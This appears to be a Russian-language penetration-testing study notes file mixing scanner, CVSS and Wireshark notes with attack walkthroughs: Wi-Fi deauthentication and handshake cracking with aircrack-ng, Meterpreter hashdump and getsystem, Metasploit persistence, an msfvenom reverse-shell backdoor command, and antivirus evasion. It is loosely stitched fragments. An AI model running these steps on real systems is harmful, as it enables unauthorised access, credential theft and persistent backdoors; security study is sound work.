projects @GitHub
Темы тестирования
Следует учитывать, что использование подобных методов может быть незаконным и опасным. DANGER !
Ст. № 273- УК- РФ Консультант Ст. 273 УК РФ
https://www.geekbrains.ru
https://www.securitylab.ru
OpenVAS
https://habr.com/ru/articles/203766/ https://dzen.ru/a/YlP_CLkNm2k3E9ek https://www.ceos3c.com/security/install-openvas-kali-linux/ https://spy-soft.net/best-vulnerability-scanners/
Для проверки, содержит ли WiFi-дамп полезную информацию для взлома, можно использовать следующие команды: Перевод адаптера Wi-Fi в режим монитора. Например, для интерфейса Wlan0 нужно ввести команду airmon-ng start wlan0. Сканирование точек доступа. Для этого используется команда airodump-ng wlan0mon. На экране появится список точек доступа в радиусе досягаемости. Использование инструментов для взлома. Например, для перебора паролей по словарю можно применить команду aircrack-ng handshake.cap -w dict.txt. Также для взлома с помощью радужных таблиц подойдёт инструмент cowpatty. Пример команды: cowpatty -r wifi.cap -f dict.txt -s raaj -s: SSID. Преобразование файла в стандартный хэш. Для этого можно использовать инструмент hcxpcapng. Например, команда hcxpcapngtool –john hash.john wifi.cap. Важно помнить, что использование подобных команд может быть незаконным и опасным.
Для получения дампа хэшей паролей в Meterpreter необходимо использовать команду hashdump. Она позволяет выгрузить любые LM или NTLM хэши в целевой системе. Хэши паролей в Windows хранятся в файле SAM (Security Accounts Manager) в каталоге %systemroot%\system32\config (под %systemroot% понимается каталог с операционной системой — по умолчанию соответствует каталогу C:\WINDOWS)
private-key (закрытый ключ)
Чтобы закрепиться с помощью Metasploit (MSF) в атакуемой Windows-системе, можно использовать скрипт persistence. Он создаёт бэкдор, который запускается при каждой загрузке системы. Также для закрепления доступа можно сгенерировать полезную нагрузку с помощью MSFvenom. Затем разместить её на компьютере цели и, например, добавить файл в автозагрузку. Ещё один способ — использовать модуль сохранения доступа (опция -S). Важно помнить, что использование подобных методов может быть незаконным и опасным. Рекомендуется обратиться к специалисту. Шаги по эксплуатации целевой системы с помощью MSF: Выбрать и настроить эксплойт (код, компрометирующий конкретную уязвимость на целевой системе). Проверить целевую систему, чтобы определить, подвержена ли она атаке с помощью эксплойта. Этот шаг является необязательным и обычно опускается, чтобы свести к минимуму обнаружение. Выбрать и настроить полезную нагрузку (код, который будет выполняться в целевой системе, после успешной эксплуатации). Выбрать метод кодирования, чтобы обойти средства обнаружения (идентификаторы/IP-адреса или антивирусное программное обеспечение). Выполнить эксплойт.
Confidentiality Impact (влияние на конфиденциальность). Integrity Impact (влияние на целостность). Availability Impact (влияние на доступность). Под определение подходят три метрики воздействия: Confidentiality Impact (влияние на конфиденциальность). Описывает возможное прямое влияние на IT-систему в случае эксплуатации уязвимости с точки зрения разглашения данных. Integrity Impact (влияние на целостность). Отображает влияние успешной эксплуатации уязвимости на целостность системы, связанную с достоверностью и точностью информации. Availability Impact (влияние на доступность). 1 Учитывает атаки, потребляющие пропускную способность сети, циклы процессора или дисковое пространство, которые влияют на доступность системы. Эти метрики описывают возможное прямое влияние на IT-систему в случае эксплуатации уязвимости независимо с точки зрения конфиденциальности, целостности и доступности.
sudo apt list --upgradable | grep security
apt-get Update | grep security
sudo apt-get install
ps -aux | grep openvas
Проверить порт сервера на доступность можно следующими способами: telnet, ping, traceroute. Проверка пропускной способности сети с помощью iPerf. X probe. Линуксовая утилита, использующая активные методы фингерпринтинга на основе методик и сценариев, что применяются в Nmap. Помимо определения ОС на удалённом хосте с использованием ICMP-запросов, в возможности программы входит сканирование TCP- и UDP-портов. Ettercap. Сниффер, который после установки и запуска начинает сниффить трафик в сети и собирать результат в создаваемых программой профайлах, откуда его можно извлечь для анализа. Этот анализ позволяет установить IP-адрес, имя и тип хоста, предположительную версию работающей там ОС, открытые порты и запущенные сервисы. Amap. Сканер, позволяющий отследить сервисы, работающие на нестандартных портах. Можно использовать совместно с любым другим сканером: сканер определяет список открытых портов на хосте, а Amap потом прощупывает этот диапазон и выясняет, какие именно службы используют эти порты. Для определения версии ОС на сканируемом хосте и получения сведений об открытых портах можно использовать утилиту Nmap - это сетевой сканер, который ищет открытые порты, умеет идентифицировать операционную систему устройства, сервисы и их версии, которые запущены на сканируемом хосте.
https://www.securitylab.ru/analytics/378647.php
Nmap позволяет выявлять уязвимости в результатах сканирования. nmap –script vuln 192.168.1.1.
Nmap позволяет выявлять уязвимости в результатах сканирования. Для этого в инструменте есть богатая библиотека скриптов для обнаружения конкретных уязвимостей. Например, скрипт vulscan берёт название ПО и прогоняет его по базам уязвимостей: CVE, OSVBD, SecurityFocus и SecurityTracker. Для поиска уязвимостей можно использовать команду nmap –script vuln 192.168.1.1. Этот скрипт из NSE выполняет быстрое сканирование на наличие известных уязвимостей, что может быть полезно для первоначальной оценки безопасности системы. Для эксплуатации уязвимостей Nmap можно использовать в сочетании с другими инструментами, например Metasploit. Metasploit Framework использует данные, полученные от Nmap, для автоматизации атак и тестов на проникновение.
Аббревиатура- [ ] SIM расшифровывается как Subscriber Identification Module, то есть «**модуль- [ ] **идентификации*- [ ] **абонента».
каким образом можно это сделать?
Рекурсивное удаление содержимого фиксированной папки можно использовать для повышения привилегий до уровня SYSTEM, если папка доступна злоумышленнику для записи от имени учетной записи SYSTEM или администратора. Чтобы повысить привилегии до NT AUTHORITY\SYSTEM в Meterpreter, можно выполнить команду getsystem. Порядок действий: Подключить модуль, в котором реализована команда getsystem: meterpreter > use priv. Проверить, загружена ли команда, выполнив её с переключателем -h, чтобы отобразить доступные опции: meterpreter > getsystem -h. Запустить getsystem без каких-либо опций, чтобы скрипт попробовал все доступные методы и остановился при успехе. Проверить, что сеанс запущен с привилегиями NT AUTHORITY\SYSTEM, выполнив команду getuid: meterpreter > getuid Server username: NT AUTHORITY\SYSTEM.
Для bruteforce-атаки на hash-пароли на GPU могут использоваться следующие утилиты: Extreme GPU Bruteforcer (EGB). Программа предназначена для восстановления паролей к хэшам различных типов, используя мощности видеопроцессора (GPU). Поддерживает алгоритмы хэширования MD5, MySQL и NTLM. Elcomsoft Distributed Password Recovery (EDPR). Программа содержит плагины, оптимизированные для использования видеокарт в брутфорсе. Поддерживает игровые видеокарты Nvidia, начиная с GeForce GTX 4xx и новее, AMD Radeon серий HD 5000–HD 8000, более современные AMD R9 и RX, а также профессиональные видеокарты (все серии Nvidia Quadro и AMD FirePro).
Информацию об учетных записях ОС Linux хранит в файле /etc/passwd
Он содержит следующее, где: User ID - логин; Password – наличие пароля; UID - идентификатор пользователя; GID - идентификатор группы по умолчанию; User Info – вспомогательная информация о пользователе (полное имя, контакты и т.д.). Файл /etc/shadow имеет следующую структуру:
loginID:password:lastchg:min:max:warn:inactive:expire
где: loginID – имя пользователя; password – пароль в зашифрованном виде; lastchg – количество дней c 1.01.1970, когда пароль был изменен в последний раз; min – минимальное число дней между сменами пароля; max – максимальное число дней, в течении которых пароль будет валиден; warn – количество дней за которые пользователь будет предупрежден об истечении пароля; inactive – количество дней, в течении которых пользователь может быть неактивен перед блокировкой; expire – дата, когда истекает срок пользовательской учетной записи.
(по условию AC:L AV:N A:H)
Базовая оценка (BS) в CVSSv3 включает следующие критерии: Вектор атаки (AV). Может быть сетевым (N), смежной сетью (A), локальным (L) или физическим (P). Сложность атаки (AC). Может быть высокой (H) или низкой (L). Уровень привилегий (PR). Может быть высоким (H), низким (L) или не требующимся (N). Взаимодействие с пользователем (UI). Может быть требуется (R) или не требуется (N). Влияние на другие компоненты системы (S). Может не оказывать влияния (U) или оказывать (C). Влияние на конфиденциальность (С). Может не оказывать влияния (N), быть низким (L) или высоким (H). Влияние на целостность (I). Может не оказывать влияния (N), быть низким (L) или высоким (H). Влияние на доступность (A). Может не оказывать влияния (N), быть низким (L) или высоким (H).
Некоторые утилиты, которые можно интегрировать с Metasploit Framework (MSF): InlineEgg. Утилита для создания ассемблерного кода средствами Python. Ассемблерные команды можно использовать для создания эффективных шёлкодов для эксплойтов. MSF имеет интерфейс для InlineEgg шёлкодов, использующий модуль ExternalPayload. Impurity. Обеспечивает интерфейс для разработки шёлкодов на C. Результат работы можно поместить в память как исполняемый ELF-образ. MSF имеет загрузчик (только для Linux) для исполняемых файлов Impurity. UploadExec. Позволяет загрузить любой исполняемый Win32-файл на эксплойтируемый хост и запустить его.
Чтобы изменить поведение RIPv1 для проведения DdoS-атаки, злоумышленник может отправить такой же запрос, подменив исходящий IP адресом объекта атаки. Адресаты выбираются по заранее подготовленному списку маршрутизаторов с поддержкой RIPv1, которые имеют подозрительно большое количество маршрутов в таблицах. В результате одиночного запроса генерируется большое количество пакетов с 504-байтовой нагрузкой, отправляемых на атакуемый адрес. На один запрос может отправляться несколько ответов по причине ограничения в 25 маршрутов на один RIP-пакет. Со стороны атакуемого видны только ответы на запросы RIPv1, которые он, разумеется, не делал. Навязывание ложного RIP-маршрутизатора X для перехвата трафика между сетями P и Q - возможна ситуация, когда значение вектора, объявляемого, например, маршрутизатором В: Q=1. В этом случае Х не может немедленно предложить лучшего маршрута, но он может применить следующий прием. Сначала, выбрав паузу в рассылке RIP-сообщений маршрутизатором В, Х от имени В отправляет в А вектор Q=16, что заставит маршрутизатор А удалить из своей таблицы маршрут в сеть Q, так как до этого А отправлял датаграммы в Q через В. Сразу же вслед за этим Х отправляет вектор Q=1 от своего имени, и А устанавливает маршрут в сеть Q через Х. Последующие векторы Q=1 от В будут проигнорированы, поскольку они не предлагают лучшего маршрута.
RST и ACK-флаги в ответных пакетах от хостов могут означать следующее: RST. Флаг RESET установлен, чтобы сообщить другому концу разорвать TCP-соединение. Это делается, если соединение по какой-то причине разорвалось, если соединение не существует или если пакет каким-то образом неправильный. ACK. Пакеты с этим флагом используются, чтобы подтвердить, что пакеты данных получены, а также подтвердить запрос на инициализацию и запрос на разрыв соединения. Например, RST/ACK может означать, что устройство подтверждает данные, отправленные в предыдущем пакете в последовательности с ACK, а затем уведомляет отправителя, что соединение закрыто с RST. Это происходит, например, когда принимающий хост не слушает на целевом порту TCP.
TCP Reset (TCP RST ACK) - что это и как искать причину? Каждый TCP пакет несёт заголовок и в нем есть биты завершения соединения: RST — обычно этот бит установлен в «0» и ничего не значит. Но иногда он получает значение 1 и это ведет к немедленному прекращению данного соединения. Хорошо это или плохо, так как красный сигнал не предвещает ничего хорошего? Все, конечно же, зависит от ситуации, когда они происходят.
TCP RST ACK – это нормальный и предусмотренный RFC 793 процесс разрыва соединения, но если их много и это оказывает влияние на производительность приложения и пользователей, то это бесспорно повод задуматься. Как всегда дьявол кроется в деталях и необходимо задать себе несколько вопросов.
Фильтры Wireshark для TCP. Чтобы увидеть только трафик TCP: tcp - чтобы увидеть только трафик. Показать TCP пакеты с включённым флагом SYN и отключённым флагом ACK: tcp.flags.syn==1 && tcp.flags.ack==0 RST tcp.flags.reset==1
Для защиты сетей на базе сигнального протокола Diameter от уязвимостей рекомендуется комплексный подход. Некоторые методы, которые могут быть использованы: Регулярный анализ защищённости. Он поможет выявить уязвимости, оценить текущий уровень защищённости и потенциальные риски, выработать защитные меры и проверить их эффективность. Важно поддерживать параметры безопасности в актуальном состоянии и проводить анализ защищённости при любых изменениях в сети, например при изменении конфигурации или внедрении нового оборудования. Использование активного фаервола. Такие решения контролируют SS7, Diameter, GTP и SMS-трафик, снабжаются встроенной аналитикой, способны сопоставлять происходящие события и реагировать на атаки. Проверка легитимности сообщений. Если оператор разрешает абонентам регистрироваться в чужих сетях, сообщения, поступающие из других сетей, должны проверяться на легитимность. Выбор наиболее подходящих методов защиты зависит от конкретных условий и требований безопасности.
В случае подозрения перехвата логина и пароля в открытом виде при разборе дампа сетевого трафика в Wireshark необходимо искать метод POST. Для этого нужно применить фильтр http.request.method == «POST»
Promiscuous mode — это «неразборчивый» режим, в котором сетевая плата позволяет принимать все пакеты независимо от того, кому они адресованы. Этот режим позволяет мониторить трафик только в данном коллизионном домене (для Ethernet или беспроводных сетей) или кольце (для сетей Token ring или FDDI). «Неразборчивый» режим часто используется снифферами — специализированными программами, позволяющими отображать и анализировать сетевой трафик для диагностики сетевых неполадок. Такие программы позволяют легко перехватывать пароли и конфиденциальные данные, передаваемые по сети в незащищённом виде.
Пробив. Использование ботов. Поиск в закрытых источниках. Сканирование уязвимостей. Несколько методов, которые злоумышленник может использовать для сбора информации о жертве с минимальными активными действиями и оставлением следов: Пробив. Раскрытие конфиденциальных данных о человеке за вознаграждение. Источниками могут быть операторы сотовой связи, государственные информационные системы, банки и другие финансовые учреждения. Использование ботов в мессенджерах. Они собирают данные из утечек. Поиск в закрытых источниках. Злоумышленник может использовать частные источники, базы данных, платные подписки и, если потребуется, тёмную сторону интернета. Сканирование уязвимостей. С его помощью проверяют соответствие конфигурации целевого хоста или приложения цели конкретного эксплойта, а также собирают информацию о запущенном программном обеспечении и номерах версий с помощью баннеров сервера, прослушиваемых портов или других сетевых артефактов. Сочетание инструментов по проникновению с легальным ПО. Это позволяет минимизировать обнаружение атаки, так как доверенные программы внесены в «белые списки» систем безопасности.
openvas-nvt-sync, openvassd, openvasmd –rebuild, openvas-scapdata-sync, openvas-certdata-sync.
Обновить базы данных уязвимостей NVT в OpenVAS можно двумя способами: Через веб-интерфейс. Для этого нужно перейти в раздел «Администрирование» и поочерёдно обновить базы данных в разделах nvt, scap и cert. Из командной строки. Для этого нужно выполнить следующие команды: openvas-nvt-sync, openvassd, openvasmd –rebuild, openvas-scapdata-sync, openvas-certdata-sync. Также обновить фиды OpenVAS, включая NVTs (тесты сетевых уязвимостей), можно с помощью команды sudo gvm-feed-update. Этот процесс может занять некоторое время, так как загружает необходимые данные для сканирования уязвимостей.
DNS Amplification (DNS усиление). Если использовать в качестве исходного IP-адреса при отправке запроса адрес компьютера жертвы (ip spoofing), то уязвимый DNS-сервер будет посылать в большом количестве ненужные пакеты компьютеру-жертве, пока полностью не парализует его работу. TCP SYN Flood. Цель атаки SYN Flood – вызвать перерасход ресурсов системы. На каждый входящий SYN-пакет система резервирует определенные ресурсы в памяти, генерирует ответ SYN+ACK, содержащий криптографическую информацию, осуществляет поиск в таблицах сессий и т. д. – то есть затрачивает процессорное время. Отказ в обслуживании наступает при потоке SYN Flood от 100 до 500 тыс. пакетов за секунду. А злоумышленник, имея хотя бы гигабитный канал, получает возможность направить поток до 1,5 млн пакетов в секунду. Smurf-атаки. Атакующий посылает поддельный пакет IСМР Echo по адресу широковещательной рассылки. При этом адрес источника пакета заменяется адресом жертвы, чтобы «подставить» целевую систему. Поскольку пакет Еcho послан по широковещательному адресу, все машины усиливающей сети возвращают жертве свои ответы. Послав один пакет IСМР в сеть из 100 систем, атакующий инициирует усиление DDoS-атаки в сто раз. Чтобы предотвратить эффект усиления, специалисты по сетевой безопасности советуют запретить операции прямой широковещательной рассылки на всех граничных маршрутизаторах. Также дополнительно стоит установить в ОС режим «тихого» отбрасывания широковещательных эхо-пакетов IСМР.
Clock Offset Bluetooth-устройств — это смещение частоты тактов для каждого обнаруженного устройства. В процессе поиска master-устройство получает от ответчиков значение тактового генератора. Затем, на этапе установления соединения, master-устройство передаёт предполагаемое значение смещения тактового генератора для slave-устройства, тем самым ускоряя процесс синхронизации двух генераторов. Для чтения смещения тактов (clock offset) можно использовать команду clkoff в утилите hcitool. Она позволяет прочитать этот параметр для устройства по Bluetooth-адресу bdaddr. Также для получения смещения между часами Bluetooth двух подключённых устройств можно использовать команду HCI Read Clock Offset.
root. флаг –privileged. Для полноценного TCP-сканирования Nmap должен быть запущен с привилегиями суперпользователя (root). Это необходимо, потому что для некоторых типов сканирования, в том числе TCP SYN, требуется отправлять и принимать сырые пакеты, а для этого нужны права пользователя root на Unix-системах. Под Windows рекомендуется работать с учётной записью администратора, хотя иногда Nmap работает и с непривилегированными пользователями, когда в ОС уже загружена утилита WinPcap. Однако есть способ запустить Nmap и без привилегий суперпользователя, но при этом поддержать все продвинутые функции и методы сканирования портов. Для этого нужно использовать флаг –privileged и сообщить программе через него, что у неё есть все необходимые возможности, хотя пользователь не является root.
Diameter — сигнальный протокол, используемый в телекоммуникационных сетях для передачи служебных данных.
Diameter — сигнальный протокол, используемый в телекоммуникационных сетях для передачи служебных данных в сетях 4G.
При атаке по типу деаутентификации используется команда aireplay-ng -0 …
# Пример
ifconfig
# Теперь для включения режима монитора введите следующую команду:
sudo airmon-ng start wlan0
# Режим мониторинга включен, теперь мы должны убить все PID, которые мешают работе адаптера, Эти процессы выделены красным цветом в примере выше. Убить процессы можно с помощью команды kill:
kill 508 1420
# обнаружим беспроводные сети вокруг нас:
airodump-ng wlan0
# интересует сеть под названием Kali на канале 1. Обратите внимание на номер канала и MAC-адрес целевой точки доступа
# Channel: 1
# BSSID: 50:D4:F7:E5:66:F4
airodump-ng -c 1 -w kali --bssid 50:D4:F7:E5:66:F4 wlan0
# перехватываем пакеты, пытаясь перехватить handshake, теперь откройте второе окно для !! деаутентификации !! клиентов из сети.
aireplay-ng -0 0 -a 50:D4:F7:E5:66:F4 wlan0
# -0 означает деаутентификацию
# Теперь нам нужно расшифровать handshake. В терминале вводим ls, чтобы перечислить все текущие каталоги и файлы. Выбираем файл с расширением ".cap", который должен называться kali-01.cap, и вводим следующую команду:
aircrack-ng -w wordlist.txt kali-01.cap
# KEY Found ...
ARP.AntiSniff. CPM. neped. sentinel. WinSniffer. CommView. ZxSniffer. SpyNet. IRIS. Метод ARP считается наиболее простым методом обнаружения снифферов в сети. Для его использования нужно передать ARP на нешироковещательный адрес. Если машина отвечает на такой ARP своим IP-адресом, значит, она находится в прослушивающем режиме. Простота метода связана с тем, что многие снифферы по умолчанию разрешают неизвестные локальному DNS-кэшу DNS-имена IP-адресов отлавливаемых кадров данных. Если сниффер поймает сообщение с неизвестным ему IP-адресом, он моментально отправит DNS-запрос дефолтному DNS-серверу на разрешение интересующего IP-адреса. Также простым методом обнаружения снифферов может считаться метод DNS. Многие прослушивающие программы автоматически делают запросы обратного DNS IP-адресов, которые они видят. Таким образом, прослушивающий режим можно обнаружить при помощи просмотра DNS-траффика, который он создаёт.
Чтобы исключить пакеты с определённым IP-адресом из поиска в Wireshark, можно использовать оператор !=.
адресов (пулов IP-адресов):
windows/meterpreter/reverse_tcp lhost=192.168.59.5 lport=4444 -f exe -о backdoor.exe. Для каких целей указывается параметр lport=4444, может ли его значение отличаться от указанного?
По данным, полученным на Pentium 4 HT с частотой 3 ГГц, время перебора PIN-кода разной длины составляет: 1 4 знака — 0,063 секунды; 5 знаков — 0,75 секунды; 6 знаков — 7,609 секунды.
Например, в Metasploit для этого можно использовать команду msfvenom, которая упрощает процесс перекодирования и встраивания payloadов, но не даёт абсолютных гарантий обхода антивирусов Использовать эксплойты нулевого дня или совершенно новое вредоносное ПО. Оно пройдёт мимо схемы обнаружения, так как компании-разработчики программного обеспечения для AV не встречались с ним ранее. Изменить сигнатуру вредоносного ПО. Если изменить кодировку программы без изменения её функциональности, она должна пройти мимо антивирусного ПО без обнаружения.
Атака “злой двойник” (Evil Twin Attack) - это кибер-атака, относящаяся к спуфингу, при которой хакер создает поддельную точку доступа Wi-Fi, имитирующую подлинную беспроводную сеть, к которой могут подключаться пользователи. Как только пользователь подключается к такой сети “злого двойника”, хакеры могут получить доступ к данным пользователя: от его сетевого трафика до личных регистрационных данных. Атаки “злого двойника” получили свое название благодаря способности хакеров имитировать какую-либо подлинную Wi-Fi сеть до такой степени, что она становится неотличима от поддельной. Этот тип атаки особенно опасен, потому что его практически невозможно идентифицировать. Техника Cafe Latte позволяет злоумышленнику обойти защиту брандмауэра и атаковать ноутбук или организовать атаку «человек посередине» и отслеживать онлайн-активность жертвы.
приложений?
Bluetooth?
можно будет проэксплуатировать в результате этой находки?
Kali Linux перед проведением МIТМ-атаки в рамках тестирования на проникновение сети?